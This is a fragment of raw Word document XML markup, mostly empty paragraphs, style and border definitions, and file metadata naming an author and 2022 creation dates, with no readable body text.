    <w:p w14:paraId="734E6856" w14:textId="2205AAC6" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E752766" w14:textId="7F755A1A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540EA6C8" w14:textId="512132ED" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AB9A00" w14:textId="2F3F94B1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353827F7" w14:textId="4661FB28" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ED11DC" w14:textId="1CD30715" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C36228" w14:textId="709974D7" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2453EA" w14:textId="6EB422EE" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FACE605" w14:textId="77011479" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7B4ACF" w14:textId="37F1D3EC" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535BCDCA" w14:textId="03F29C0C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D592DC9" w14:textId="313E3F0E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C05B70E" w14:textId="424C6C0D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DA1202" w14:textId="30F17DB1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6FB429" w14:textId="475F5FF6" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F13CC1" w14:textId="31B49088" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771971C4" w14:textId="262E6D88" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2CC1A9" w14:textId="760E66A1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21842075" w14:textId="64DDE69E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE52B7E" w14:textId="05C2506D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A941C4D" w14:textId="6F0E5A03" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A00D18" w14:textId="5B2309B0" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A379913" w14:textId="71F85C92" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600431BE" w14:textId="1BF524A9" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268C2AAF" w14:textId="6A4E3365" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55168FE5" w14:textId="5D9B14BD" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21777A9E" w14:textId="7FA7BEB6" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614C389D" w14:textId="4424B979" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEC3A03" w14:textId="347A63E0" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56565999" w14:textId="49B81886" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3691B3A2" w14:textId="0EA5175C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7DDF2A" w14:textId="6DE737AE" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4FFDEE" w14:textId="49CD66B5" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EA0006" w14:textId="170FD0F5" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CFF442" w14:textId="48DA7D17" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FDB187" w14:textId="1F90372D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA1767D" w14:textId="1F4B8725" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8C5DB3" w14:textId="36F36BE7" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337F4886" w14:textId="350DFAB9" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74584DF7" w14:textId="7AB3F6DC" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6512591F" w14:textId="0BF1D634" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B3377F" w14:textId="1164DC3B" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656175C9" w14:textId="66F07C41" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32DBBA75" w14:textId="328CE31C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F18362" w14:textId="094A3B1E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCAB2AE" w14:textId="1E35B3AD" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3AAE12" w14:textId="1F34A130" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41186E34" w14:textId="61488A78" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F505AC" w14:textId="70E7566C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EB5D40" w14:textId="61654F5E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A2B161" w14:textId="2A7B7CC1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6DB986" w14:textId="32733979" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0970B119" w14:textId="77777777" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00426555" w:rsidRPr="00152206" w:rsidSect="008973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D3F69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D230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8973B0"/>
    <w:rsid w:val="00152206"/>
    <w:rsid w:val="00184525"/>
    <w:rsid w:val="0029367B"/>
    <w:rsid w:val="00406512"/>
    <w:rsid w:val="00426555"/>
    <w:rsid w:val="00500331"/>
    <w:rsid w:val="006C7617"/>
    <w:rsid w:val="008973B0"/>
    <w:rsid w:val="0091294D"/>
    <w:rsid w:val="00924D7D"/>
    <w:rsid w:val="009D1F1B"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00AE4F08"/>
    <w:rsid w:val="00D573F8"/>
    <w:rsid w:val="00EF7844"/>
    <w:rsid w:val="00FE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5FB3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C33881C7-C8D5-45B8-ACA3-C8275EED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64"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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A64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A64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A64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A64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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64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A6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A6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32"/>
      <w:szCs w:val="3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2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2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6"/>
      <w:szCs w:val="26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4"/>
      <w:szCs w:val="24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styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004265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03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4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6976">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1695571431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59882">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="153034028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5198">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1875120614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73">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="992568443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2390">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="930888947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3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8094">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="901212330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swigger.net/burp/application-security-testing/oa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To.Nguyen Truong An IT-QF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>To.Nguyen Truong An IT-QF</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-19T13:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-20T04:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>